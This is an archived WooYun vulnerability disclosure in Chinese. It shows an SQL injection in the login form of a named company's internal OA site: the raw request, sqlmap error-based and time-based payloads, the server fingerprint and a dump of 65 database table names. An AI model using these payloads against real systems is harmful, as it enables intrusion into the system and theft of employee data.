乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
POST /index.php/Home/Index/ HTTP/1.1Content-Length: 179Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://work.locojoy.comCookie: PHPSESSID=ke5ruinsoeh0knj1dkjds2ukb4Host: work.locojoy.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*act=login&password=g00dPa%24%24w0rD&username=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=login&password=g00dPa$$w0rD&username=1') AND (SELECT 8346 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,(SELECT (ELT(8346=8346,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lXho'='lXho Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=login&password=g00dPa$$w0rD&username=1') AND (SELECT * FROM (SELECT(SLEEP(5)))Kayt) AND ('aUos'='aUos---web server operating system: Linux CentOS 6.5web application technology: Apache 2.2.15back-end DBMS: MySQL >= 5.0.0Database: locojoy_oa[65 tables]+----------------------------+| lj_activity || lj_chengshi || lj_city || lj_company || lj_config_christmas || lj_creditcard_list || lj_depart_group || lj_department || lj_dkp_data || lj_dkp_list || lj_employee || lj_file_doc || lj_file_table || lj_file_table_type || lj_food_menu || lj_group || lj_holiday || lj_kpi_data || lj_kpi_depart || lj_kpi_list || lj_kpi_option || lj_logs || lj_lottery || lj_mobile || lj_module || lj_notice || lj_province || lj_score_week || lj_share1 || lj_share2 || lj_share3 || lj_system_event || lj_user || lj_user_christmas || lj_user_clock || lj_user_creditcard || lj_user_food || lj_user_gamecoins || lj_user_holiday || lj_user_holiday_data || lj_user_holiday_no1year || lj_user_kpi || lj_user_log || lj_user_lottery || lj_user_lottery_outer || lj_user_massageticket || lj_user_memo || lj_user_message || lj_user_message1 || lj_user_project_data || lj_user_project_list || lj_user_project_node || lj_user_projectreport_data || lj_user_projectreport_list || lj_user_score || lj_user_score_level || lj_user_score_sp || lj_user_score_txt || lj_vote_data || lj_vote_list || lj_vote_xing || lj_wifi || lj_worklog || lj_worklog_inner || lj_worklog_pl |+----------------------------+
危害等级:无影响厂商忽略
忽略时间:2016-01-23 13:10
漏洞Rank:15 (WooYun评价)
暂无